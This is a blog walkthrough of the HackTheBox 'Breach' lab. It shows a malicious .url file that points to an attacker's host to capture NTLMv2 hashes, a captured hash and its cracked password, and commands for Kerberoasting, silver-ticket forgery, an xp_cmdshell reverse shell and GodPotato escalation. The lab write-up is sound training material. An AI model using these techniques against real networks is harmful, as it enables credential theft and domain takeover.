top of page
Search

HTB Breach Machine

  • BlueDolphin
  • 2 days ago
  • 4 min read

Link to the official lab.


Official Synopsis

Breach is a medium difficulty Windows machine, where guest access to an SMB share is available. By leveraging write permissions on that SMB share, NTLMv2 hashes of a domain user are captured to obtain valid credentials. With access as a low-privileged domain user, a kerberoastable service account (svc_mssql) is revealed. After getting access to the service account, a Silver Ticket attack is performed to impersonate the Administrator user and gain access to Microsoft SQL Server. Through the xp_cmdshell feature, remote code execution is achieved as the svc_mssql service account. Finally, privilege escalation is performed by abusing the SeImpersonatePrivilege privilege.


My Engagement Flow


Tools Used

  • Impacket suite

  • Sharp hound

  • Blood hound (Blood-hound python native in Parrot)

  • Responder

  • enum4linux

  • smbclient

  • pypykatz

  • ticketer


Tactics/Techniques

  • Anonymous SMB access

  • Man in the middle attack

  • Hash cracking

  • Malicious .url file development


References


Step by Step Summary

  1. Host enumeration

    • Kerberos services

    • Open SMB share no auth required

    • MSSQL Service

  2. Foothold

    1. Create a malicious .url file with a pointer to our host

    2. Upload malicious file to open SMB share

    3. Wait for user to navigate to the folder and select our file.

      1. This will force a NTLM auth

    4. Use responder to listen to the auth request to grab the hash

      1. Crack the hash

    5. Authenticate with Julia's credentials.

  3. Lateral Movement

    1. Enumerate AD

      1. Blood hound to enumerate

      2. Blood hound to visualize findings

      3. List all Kerberoastable Accounts

    2. Retrieve vulnerable account SPN identifier

      1. Crack the SPN hash

      2. Authenticate to the domain with new credentials

    3. Forge a silver ticket

      1. Authenticate to MSSQL as admin

    4. Call SQL XP cmdshell reverse shell for access.


Host enumeration

Our scan results paint a picture of an active directory related environment. We see key ports such as port 88 for kerberos, port 389 for ldap, and SQL running on port 1433. The domain name is breach.v1.


Enum 4 Linux

Let's get some more information by using enum 4 linux.

We learn that the file share allows anonymous access


Smbclient -N -L

We are able to enumerate and view the file shares while unauthorized.


Who's who in the zoo

Looking under the transfer folder reveals user names. Julia.wong is the most recent user with activity from April 16th.


Foothold

Quick summary for Foothold

  1. Create a malicious .url file with a pointer to our host

  2. Upload malicious file to open SMB share

  3. Use responder to listen to the auth request to grab the hash

    1. Crack the hash

    2. Wait for user to navigate to the folder and select our file.

    3.  This will force a NTLM auth

  4. Authenticate with Julia's credentials.


Because we have write access to the shares, our attack needs to pivot off user interaction with a file we write. The solution here is to force the auth request to our local server where we can capture it with a tool such as responder. With that we can attempt to crack the hash for the associated user in the auth request.


  1. Create a malicious .url file with a pointer to our host:

    Let's create a internet shortcut file that points to our server and save it as a .url file.

[InternetShortcut]
URL=boom
WorkingDirectory=hehe
IconFile=\\attacking ip\boom\nc.ico
IconIndex=1

  1. Upload malicious file to open SMB share

  2. Use responder to listen to the auth request to grab the hash

    1. Crack the hash

    2. Wait for user to navigate to the folder and select our file.

    3.  This will force a NTLM auth

Responder output below 

[SMB] NTLMv2-SSP Client   : 10.129.227.163
[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong
[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:5659b015ce45205b:3433FBF8897DE0EC0813CC52B2B386A7:0101000000000000807303245890DC0102E2DFA4E95495B40000000002000800500051003200510001001E00570049004E002D005500350048003100350036004A00320047004300480004003400570049004E002D005500350048003100350036004A0032004700430048002E0050005100320051002E004C004F00430041004C000300140050005100320051002E004C004F00430041004C000500140050005100320051002E004C004F00430041004C0007000800807303245890DC0106000400020000000800300030000000000000000100000000200000F935B311C2D679477BBF9E4DC3BE1B4B30596A5843969900C9E8580B5507AC950A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00360032000000000000000000

Crack the hash and retrieve the password.

hashcat hash.txt /usr/share/wordlists/rockyou.txt.gz
Computer1

  1. Authenticate with Julia's credentials.


Lateral movement

Quick summary


  1. Enumerate AD

    1. Blood hound to enumerate

    2. Blood hound to visualize findings

    3. List all Kerberoastable Accounts

  2. Retrieve vulnerable account SPN identifier

    1. Crack the SPN hash

    2. Authenticate to the domain with new credentials

  3. Forge a silver ticket

    1. Authenticate to MSSQL as admin

  4. Call SQL XP cmdshell reverse shell for access.


With access to the system as a low privilege user we will enumerate the active directory domain for any paths to escalation. This can be accomplished by using blood hound. However just to clarify, sharp hound is what actually enumerates and collects the log files and blood hound just visualizes that data once uploaded. It is here we will learn that there is an account with the SPN value set which will become the focus of our next path.


  1. Enumerate AD

    1. Blood hound to enumerate

    2. Blood hound to visualize findings

    3. List all Kerberoastable Accounts


bloodhound-python -d breach.vl -u 'julia.wong' -p 'Computer1' -dc 'BREACHDC.breach.vl' -c all -ns 10.129.223.31 --dns-tcp

2. Retrieve vulnerable account SPN identifier

  • Crack the SPN hash

  • Authenticate to the domain with new credentials


Impacket features a tool designed to grab the users SPN from Kerveros if the users password is known.


With the hash in hand we can perform a hash crack but only if it is a simple and known password.


pypykatz calculates the NT hash of a given password and outputs it to STDOUT.

  1. Forge a silver ticket

    • Authenticate to MSSQL as admin


Ticketer is used to forge a silver ticket and requires the below:

  • SPN account name

  • Domain SID of account

  • nthash of password

  • Kerp IP

  • user ID

ticketer.py -spn MSSQLSvc/breachdc.breach.vl -domain-sid S-1-5-21-2330692793-3312915120-706255856 -nthash 69596c7aa1e8daee17f8e78870e25a5c -dc-ip 10.129.223.136 -domain breach.vl -user-id 500 Administrator


  1. Call SQL XP cmdshell reverse shell for access.



Going further with privilege escalation involves finding the impersonate privillege value on the account, and simply running GodPotato for the reverse shell.






THE END

 
 
 

Comments

bottom of page